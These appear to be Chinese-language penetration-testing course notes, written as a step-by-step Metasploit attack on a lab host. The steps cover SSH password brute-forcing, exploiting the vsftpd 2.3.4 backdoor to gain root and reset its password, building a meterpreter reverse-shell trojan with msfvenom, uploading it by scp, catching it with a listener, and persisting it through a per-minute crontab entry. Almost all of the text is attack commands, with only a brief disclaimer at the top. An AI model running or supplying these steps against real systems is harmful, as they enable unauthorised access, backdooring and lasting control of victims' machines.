==禁止非法操作,仅限参考=
暴力破解
- 编辑密码本(vim password.txt)
- 无声进入msf(msfconsole -q)
- 搜索ssh_login相关程序(search ssh_login)
- 设置攻击参数(use 0)
设置用户名(set username msfadmin)
设置密码本(set pass_file /root/password.txt)
设置攻击目标(set rhosts 192.168.10.143) - 发起攻击(运行run)
- 查看攻击会话(sessions)
- 进入某个会话(sessions ID)
- 退出(exit)
- show options://显示程序运行时所需要的参数
漏洞利用
- 扫描目标是否存在"笑脸漏洞(vsftpd2.3.4)"(nmap -sV ip)
- 发起漏洞利用
进入msf(msfconsole)
搜索vsftpd(search vsftpd)
使用程序(use 0)
设置攻击目标(set rhosts ip) - 发起攻击(run)
- whoami://查看是哪个用户
- passwd root:// 设置密码
植入木马,达到长期控制的目的
- msfvenom:攻击载荷生成器
-p://选择一个载荷
-f://生成文件格式 (linux可执行的程序文件:elf,windows可执行的文件:exe)
lhost://监听地址(攻击机kali的地址)
lport://监听端口(攻击机kali的端口)
-o:指定输出的文件名
-h:查看帮助 - msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf lhost=192.168.10.224 lport=4444 -0 shell: // 给主机192.168.10.224,生成一个名为shell,端口为4444的木马程序
为了防止上传报错,需要修改kali的ssh配置
- 创建.ssh目录
mkdir .ssh - 配置config
vim .ssh/config - 添加三行配置
- Host
- HostkeyAlgorithms +ssh-rsa
- PubkeyAcceptedKeyTypes +ssh-rsa
- 以root身份上传shell后门到192.168.10.143的/mnt
scp shell [email protected]:/mnt
运行shell
- 手动运行shell后门程序
/mnt/shell & (&后台运行) - 在kali中侦听木马程序
- 进入msf
msfconsole - 使用侦听程序
use exploit/multi/handler - 设置监听地址
set lhost 192.168.10.224 - 设置监听端口
set lport 4444 - 设置载荷
set payload linux/x86/meterpreter/reverse_tcp - 运行
run
ps:侦听模块在侦听木马上线的时候参数值必须与生成木马的参数一致
如果想要让木马长期运行不被kill,需要做计划任务,定期运行
- 编辑计划任务:
- EDITOR:编辑器
EDITOR=vim crontab -e
*
*
*
*
* /mnt/shell&(每分钟运行一次) - 再次进入msf
- 使用侦听程序
use exploit/multi/handler - 设置监听地址
set lhost 192.168.10.224 - 设置监听端口
set lport 4444 - 设置载荷
set payload linux/x86/meterpreter/reverse_tcp - 运行
run - 查看计划任务
crontab -l - meterpreter>下将会话放到后台
background